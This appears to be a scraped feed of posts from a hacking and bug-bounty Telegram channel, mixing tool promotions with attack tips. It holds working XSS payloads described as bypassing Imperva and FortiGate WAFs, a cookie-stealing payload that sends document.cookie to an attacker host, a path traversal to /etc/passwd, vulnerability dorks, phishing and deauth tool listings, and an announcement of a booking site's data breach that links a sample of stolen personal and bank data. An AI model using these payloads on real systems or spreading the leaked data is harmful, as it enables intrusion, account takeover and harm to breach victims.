Payload XSS:
#Payload #XSS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<IFRAME SRC="javanoscript:prompt(document.cookie);"></iframe>
#Payload #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤3⚡2
Discovered an XSS vulnerability but Imperva WAF blocked it?
Try this XSS payload to bypass Imperva's protection.
#BugBounty #Bypass_Imperva #Payload #XSS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Try this XSS payload to bypass Imperva's protection.
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=alert(origin)>
#BugBounty #Bypass_Imperva #Payload #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡2🔥2
📢 The otaghak was hacked by irLeaks!
In short, we have the following:
- reservation information; including name and surname, reservation date, length of stay, payment fee, national code, contact number, email, etc.
- settlement information; Including the amount, bank information, denoscription, date
- messages and chats; including activation code or password, support messages and...
- Information including username, password, first and last name, gender, contact number, national code, IP address, user agent, etc.
- Payment information including payment denoscription, payment date, amount, payer information
- detailed information of bookable places; including exact address, longitude and latitude, city, zip code, etc.
- User search information including city, province, search filters, search time frame, amount, user ID, IP address, etc.
- Bank information including name and surname of the account holder, user name, Shaba number, bank name, card number
- Discount coupons and other general information
⬇️ Sample:
https://mega.nz/file/SFskzKBR#jmEvTv8RiAQqdeanoDbVisAgzgKyuDEA-eUxIES8ebU
#NEWS #Notifaction #irleaks #otaghak
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
In short, we have the following:
- reservation information; including name and surname, reservation date, length of stay, payment fee, national code, contact number, email, etc.
- settlement information; Including the amount, bank information, denoscription, date
- messages and chats; including activation code or password, support messages and...
- Information including username, password, first and last name, gender, contact number, national code, IP address, user agent, etc.
- Payment information including payment denoscription, payment date, amount, payer information
- detailed information of bookable places; including exact address, longitude and latitude, city, zip code, etc.
- User search information including city, province, search filters, search time frame, amount, user ID, IP address, etc.
- Bank information including name and surname of the account holder, user name, Shaba number, bank name, card number
- Discount coupons and other general information
⬇️ Sample:
https://mega.nz/file/SFskzKBR#jmEvTv8RiAQqdeanoDbVisAgzgKyuDEA-eUxIES8ebU
#NEWS #Notifaction #irleaks #otaghak
Please open Telegram to view this post
VIEW IN TELEGRAM
👀3🫡3👏2👍1
WiFi Penetration Testing & Auditing Tool
Freeway is a Python scapy-based tool for WiFi penetration that aim to help ethical hackers and pentesters develop their skills and knowledge in auditing and securing home or enterprise networks.
PIP:
sudo pip install 3way
Manually:
cd Freeway
sudo pip install .
#1 sudo Freeway
#2 sudo Freeway -i wlan2 -a monitor -p 1,2,a
#3 sudo Freeway -i wlan2 -a deauth
BugCod3#Python #Wifi #Pentesting
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍3⚡2🔥2
Tips for XSS Bypass:
https://sub.target.com --> 403 (Forbidden)
https://sub.target.com/%3f/ --> 200 (OK)
dork for the vulnerable parameters
#BugBounty #Tips #XSS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
https://sub.target.com --> 403 (Forbidden)
https://sub.target.com/%3f/ --> 200 (OK)
dork for the vulnerable parameters
`site:*.target.com inurl:"?name="`and `site:*.target.com inurl:"?type="`
#BugBounty #Tips #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤2🔥2
Subzy
💬
Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Installation:
👩💻
📊 Options:
Only required flag for
⚪️
⚪️
⚪️
⚪️
⚪️
⚪️
⚪️
💻 Usage:
Target subdomain can have protocol defined, if not
⚪️ List of subdomains:
⚪️ Single or multiple targets:
😸 Github
⬇️ Download
🔒
#BugBounty #Cybersecurity #Subdomain #Takeover
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Installation:
go install -v github.com/LukaSikic/subzy@latest
Only required flag for
run subcommand(r short version) is either --target or --targets--target (string) - Set single or multiple (comma separated) target subdomain/s--targets (string) - File name/path to list of subdomains--concurrency (integer) - Number of concurrent checks (default 10)--hide_fails (boolean) - Hide failed checks and invulnerable subdomains (default false)--https (boolean) - Use HTTPS by default if protocol not defined on targeted subdomain (default false)--timeout (integer) - HTTP request timeout in seconds (default 10)--verify_ssl (boolean) - If set to true, it won't check site with invalid SSLTarget subdomain can have protocol defined, if not
http:// will be used by default if --https not specifically set to true../subzy run --targets list.txt
./subzy run --target test.google.com
./subzy run --target test.google.com,https://test.yahoo.com
BugCod3#BugBounty #Cybersecurity #Subdomain #Takeover
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3⚡2❤2🔥2
🖤
#Notifaction
Please open Telegram to view this post
VIEW IN TELEGRAM
😢6❤4👎4❤🔥2
Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor:
Version:
Tested on OS: Microsoft Windows 10 pro x64
🕷 Exploit-db
⬇️ Download
#Exploit #ESET #NOD32
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor:
https://www.eset.comVersion:
17.0.16.0Tested on OS: Microsoft Windows 10 pro x64
#Exploit #ESET #NOD32
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2⚡2👎2🔥2👍1
WAF Fortinet FortiGate XSS Bypass
Payload:
#XSS #WAF #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>
#XSS #WAF #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤2👍2🔥2👏2
Change IP Address Every 3 Seconds
⬇️ Download + (Readme.txt)
🔒
#Tor #Net #IP
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
BugCod3#Tor #Net #IP
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥3❤2
DARKARMY is a Collection Of Penetration Testing Tools, you will have every noscript that a hacker needs
👤 Information Gathering:
⚪️ Nmap
⚪️ Setoolkit
⚪️ Port Scanning
⚪️ Host to IP
⚪️ Wordpress User
⚪️ CMS Scanner
⚪️ XSStrike
⚪️ Dork - Google Dorks Passive Vulnerability Auditor
⚪️ Scan A server's Users
⚪️ Crips
🔓 Password Attacks:
⚪️ CUpp
⚪️ Ncrack
🛜 Wireless Testing:
⚪️ reaver
⚪️ pixiewps
⚪️ Fluxion
🌍 Exploitaition Tools:
⚪️ ATSCAN
⚪️ sqlmap
⚪️ Shellnoob
⚪️ commix
⚪️ FTP auto Bypass
⚪️ jboss-autopwn
📂 Social Engineering:
⚪️ Setoolkit
⚪️ SSLtrip
⚪️ pyPHISHER
⚪️ ZPHISHER
🧑💻 Web Hacking:
⚪️ Drupal Hacking
⚪️ Inurlbr
⚪️ Wordpress & Joomla Scanner
⚪️ Gravity From Scanner
⚪️ File Upload Checker
⚪️ Wordpress Exploit & Plugins Scanner
⚪️ Shell and Directory Finder
⚪️ Joomla! 1.5 - 3.4.5 remote code execution
⚪️ Vbulletin 5.X remote code execution
⚪️ BruteX - Automatically brute force all services running on a target
⚪️ Arachni - Web Application Security Scanner Framework
And ...
🔼 Installation:
This Tool Must Run As ROOT !!!
That's it. You can execute tool by typing DARKARMY
You can also use this tool inside the Termux of the phone
😸 Github
🎞 Youtube (Demo)
⬇️ Download
🔒
#Hacking #Tools #Pack #Penetration
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
And ...
This Tool Must Run As ROOT !!!
cd DARKARMY
chmod +x install.sh
./install.sh
That's it. You can execute tool by typing DARKARMY
You can also use this tool inside the Termux of the phone
BugCod3#Hacking #Tools #Pack #Penetration
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤5🔥4⚡2
Reflected XSS may lead to ATO
Payload:
Simple Tip:
Test php-params.txt for: sqli, xss, html injection...etc
Attacking Cookies:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
"><noscript>alert(document.cookie)</noscript>
Simple Tip:
cat parameters.txt | grep ".php?" > php-params.txt
Test php-params.txt for: sqli, xss, html injection...etc
Attacking Cookies:
https://sub.target.com/en/test.php?vuln-param="><noscript>document.write('<img src="https://hacker-site/thing/?c='%2bdocument.cookie%2b'" />');</noscript#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤3⚡2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
Udemy - Bug Bounty Hunting Guide to an Advanced Earning Method
⬇️ Download 🌐
#BugBounty #Course #Udemy
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#BugBounty #Course #Udemy
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6⚡2👍2🔥2
Payload:
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4⚡3
Bypass dot (.) block in XSS
❌ alert(document.cookie)
✅ alert(cookie)
Some times '
#XSS #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Some times '
cookie' is a variable declared as 'document.cookie'#XSS #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥4❤3
Waf block any
Try HTML injection
Payload:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
"</"Try HTML injection
</a> worked...Payload:
</a<noscript>alert(document.cookie</noscript>#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡2🔥2